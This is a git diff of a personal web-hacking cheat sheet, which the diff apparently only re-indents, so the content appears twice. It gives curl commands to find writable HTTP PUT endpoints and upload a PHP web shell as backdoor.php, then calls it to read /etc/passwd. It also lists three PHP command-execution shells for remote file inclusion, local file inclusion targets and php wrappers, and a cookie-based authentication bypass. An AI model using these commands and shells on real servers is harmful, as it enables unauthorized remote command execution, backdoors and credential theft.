alexandercastillo1 · August 11, 2018 15:14
diff --git a/PlayingWithWebsitesThatWorks.txt b/PlayingWithWebsitesThatWorks.txt
 Check PUT options for a bunch of web links
 curl -v -X OPTIONS $(cat /root/Desktop/bunchoflinks.txt)

 Check PUT options for a web link
 curl -v -X OPTIONS http://link/sublink

 Inject backdoor on PUT
 curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://link/sublink/backdoor.php
 calling backdoor
 http://link/sublink/backdoor.php?cmd=cat%/etc/passwd

 Get Server banner
 curl -I -L http://link

 Bypass Authentication via Token
 Use CookiesManager+

 Remote File Inclusion Shells
 <?php
 system($_GET['cmd']);
 >?
 <?php
 passthru($_REQUEST['cmd']);
 ?>
 <?php
 echo exec($_POST['cmd']);
 ?>

 Local File Inclusion
 Use LFISuite - Proceed to attack based on what you find: Auth.log, Access.log, /proc/Self/fd, /proc/self/environ, phar, filter, expect, input, data, or zip

 Key for File Inclusion on PHPinfo
 allow_url_fopen=on - LFI is possible
 allow_url_include=off - RFI may not be possible
 display_errors=off - errors are not displayed
	Check PUT options for a bunch of web links
	curl -v -X OPTIONS $(cat /root/Desktop/bunchoflinks.txt)

	Check PUT options for a web link
	curl -v -X OPTIONS http://link/sublink

	Inject backdoor on PUT
	curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://link/sublink/backdoor.php
	calling backdoor
	http://link/sublink/backdoor.php?cmd=cat%/etc/passwd

	Get Server banner
	curl -I -L http://link

	Bypass Authentication via Token
	Use CookiesManager+

	Remote File Inclusion Shells
	<?php
	system($_GET['cmd']);
	>?
	<?php
	passthru($_REQUEST['cmd']);
	?>
	<?php
	echo exec($_POST['cmd']);
	?>

	Local File Inclusion
	Use LFISuite - Proceed to attack based on what you find: Auth.log, Access.log, /proc/Self/fd, /proc/self/environ, phar, filter, expect, input, data, or zip

	Key for File Inclusion on PHPinfo
	allow_url_fopen=on - LFI is possible
	allow_url_include=off - RFI may not be possible
	display_errors=off - errors are not displayed